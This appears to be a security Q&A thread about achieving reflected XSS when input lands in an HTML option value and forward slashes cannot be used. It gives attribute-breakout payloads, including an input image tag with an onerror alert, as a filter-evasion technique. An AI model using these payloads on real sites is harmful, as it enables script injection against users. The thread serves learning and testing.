# XSS in options tag without forward slash

Tags: xss

I am trying work on an XSS scenario. Would appreciate if anyone can help.

URL: www.example.com/mydata

"mydata" is landing in html as follows:

```
200 OK
...
Content-Type: text/html; charset=utf-8
...
...
<select>
<option value="mydata"> Anything</option>
</select>
......
```

Since the "mydata" is in URL I cannot use a payload with forward slashes. Thus, I am not able to use script tag to execute script since I am unable to close it without forward slash. Other payloads like `<BODY ONLOAD=alert('XSS')>` are not working with options tag.

Does anyone know a way to introduce xss in this scenario?

Comment: Have you looked at XSS syntax that does not use slashes?

Comment: I am not sure i have but i will check. Could you point me to some references for XSS syntax that does not use slashes?

Answer (score 2, accepted):

You have at least basic XSS:

```
...
<select><option value="XSS"><input type="image" src="https:\\happyorhungry.files.wordpress.com\2011\10\cookie_monster_original.jpg">Anything</option></select>
...
```

Where your input is:

```
XSS"><input type="image" src="https:\\happyorhungry.files.wordpress.com\2011\10\cookie_monster_original.jpg
```

Comment: I think I'm missing something; doesn't your input have forward slashes and therefore won't work in the URL?

Comment: Good point. I converted them into backslashes.

Comment: @Wrycu Thanks alot!!! was looking for a tag that would work with option tag. Finally got it to work with this < input type="image" src="a" onerror=" alert(123)">